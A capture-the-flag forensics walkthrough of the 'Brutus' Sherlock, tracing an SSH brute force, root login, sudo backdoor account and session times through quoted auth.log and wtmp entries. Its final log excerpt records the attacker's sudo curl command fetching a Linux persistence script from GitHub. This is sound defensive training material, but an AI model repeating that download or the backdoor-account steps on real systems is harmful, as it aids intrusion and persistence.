Post

Brutus

Posted
By Muhammad Taha Khan
4 min read
Brutus

Scenario

In this very easy Sherlock, you will familiarize yourself with Unix auth.log and wtmp logs. We’ll explore a scenario where a Confluence server was brute-forced via its SSH service. After gaining access to the server, the attacker performed additional activities, which we can track using auth.log. Although auth.log is primarily used for brute-force analysis, we will delve into the full potential of this artifact in our investigation, including aspects of privilege escalation, persistence, and even some visibility into command execution.

After downloading the files we can see:

1
2
3
4
5
6
7

ls -la
total 68
drwxrwxr-x 2 kali kali  4096 Jul 31 22:56 .
drwxrwxr-x 3 kali kali  4096 Jul 31 22:47 ..
-rw-rw-r-- 1 kali kali 43911 Mar  6  2024 auth.log
-rw-r--r-- 1 kali kali  3154 Apr 30 13:51 utmp.py
-rw-rw-r-- 1 kali kali 11136 Mar  6  2024 wtmp

Solving the questions

  • Analyze the auth.log. What is the IP address used by the attacker to carry out a brute force attack?

We will go through the auth.log file and figure out which IP had the highest request in the shortest time.

It’s fairly easy to spot the abnormal requests:

1
2
3
4

Mar  6 06:31:31 ip-172-31-35-28 sshd[2330]: Invalid user admin from 65.2.161.68 port 46422
Mar  6 06:31:31 ip-172-31-35-28 sshd[2337]: Invalid user admin from 65.2.161.68 port 46498
Mar  6 06:31:31 ip-172-31-35-28 sshd[2328]: Invalid user admin from 65.2.161.68 port 46390
Mar  6 06:31:31 ip-172-31-35-28 sshd[2335]: Invalid user admin from 65.2.161.68 port 46460
  • The bruteforce attempts were successful and attacker gained access to an account on the server. What is the username of the account?

We will go through the log file manually (or we could actually create a script):

1

Mar  6 06:31:40 ip-172-31-35-28 sshd[2411]: Accepted password for root from 65.2.161.68 port 34782 ssh2
  • Identify the UTC timestamp when the attacker logged in manually to the server and established a terminal session to carry out their objectives. The login time will be different than the authentication time, and can be found in the wtmp artifact.
1
2
3

python3 utmp.py wtmp

"USER"  "2549"  "pts/1" "ts/1"  "root"  "65.2.161.68"   "0"     "0"     "0"     "2024/03/06 11:32:45"   "387923"        "65.2.161.68"

Since my system is in GMT+5 the time that is shown has to be subtracted from 5 hours. 2024-03-06 06:32:45

  • SSH login sessions are tracked and assigned a session number upon login. What is the session number assigned to the attacker’s session for the user account from Question 2?

Going back to auth.log:

1
2
3

Mar  6 06:32:44 ip-172-31-35-28 sshd[2491]: Accepted password for root from 65.2.161.68 port 53184 ssh2
Mar  6 06:32:44 ip-172-31-35-28 sshd[2491]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)
Mar  6 06:32:44 ip-172-31-35-28 systemd-logind[411]: New session 37 of user root.

37 is the session number.

  • The attacker added a new user as part of their persistence strategy on the server and gave this new user account higher privileges. What is the name of this account?
1
2
3
4
5
6
7
8
9
10
11
12
13
14

Mar  6 06:34:18 ip-172-31-35-28 groupadd[2586]: group added to /etc/group: name=cyberjunkie, GID=1002
Mar  6 06:34:18 ip-172-31-35-28 groupadd[2586]: group added to /etc/gshadow: name=cyberjunkie
Mar  6 06:34:18 ip-172-31-35-28 groupadd[2586]: new group: name=cyberjunkie, GID=1002
Mar  6 06:34:18 ip-172-31-35-28 useradd[2592]: new user: name=cyberjunkie, UID=1002, GID=1002, home=/home/cyberjunkie, shell=/bin/bash, from=/dev/pts/1
Mar  6 06:34:26 ip-172-31-35-28 passwd[2603]: pam_unix(passwd:chauthtok): password changed for cyberjunkie
Mar  6 06:34:31 ip-172-31-35-28 chfn[2605]: changed user 'cyberjunkie' information
Mar  6 06:35:01 ip-172-31-35-28 CRON[2614]: pam_unix(cron:session): session opened for user root(uid=0) by (uid=0)
Mar  6 06:35:01 ip-172-31-35-28 CRON[2616]: pam_unix(cron:session): session opened for user confluence(uid=998) by (uid=0)
Mar  6 06:35:01 ip-172-31-35-28 CRON[2615]: pam_unix(cron:session): session opened for user confluence(uid=998) by (uid=0)
Mar  6 06:35:01 ip-172-31-35-28 CRON[2614]: pam_unix(cron:session): session closed for user root
Mar  6 06:35:01 ip-172-31-35-28 CRON[2616]: pam_unix(cron:session): session closed for user confluence
Mar  6 06:35:01 ip-172-31-35-28 CRON[2615]: pam_unix(cron:session): session closed for user confluence
Mar  6 06:35:15 ip-172-31-35-28 usermod[2628]: add 'cyberjunkie' to group 'sudo'
Mar  6 06:35:15 ip-172-31-35-28 usermod[2628]: add 'cyberjunkie' to shadow group 'sudo'
  • What is the MITRE ATT&CK sub-technique ID used for persistence by creating a new account?

Go to the MITRE ATT&CK website and go through the persistence strategies.

Tactic

T1136.001

  • What time did the attacker’s first SSH session end according to auth.log?
1

"DEAD"  "2491"  "pts/1" ""      ""      ""      "0"     "0"     "0"     "2024/03/06 11:37:24"   "590579"        "0.0.0.0"

Subtract again: 2024-03-06 06:37:24

  • The attacker logged into their backdoor account and utilized their higher privileges to download a script. What is the full command executed using sudo?
1

Mar  6 06:39:38 ip-172-31-35-28 sudo: cyberjunkie : TTY=pts/1 ; PWD=/home/cyberjunkie ; USER=root ; COMMAND=/usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh
Sherlocks
HTB Sherlock Very Easy
This post is licensed under CC BY 4.0 by the author.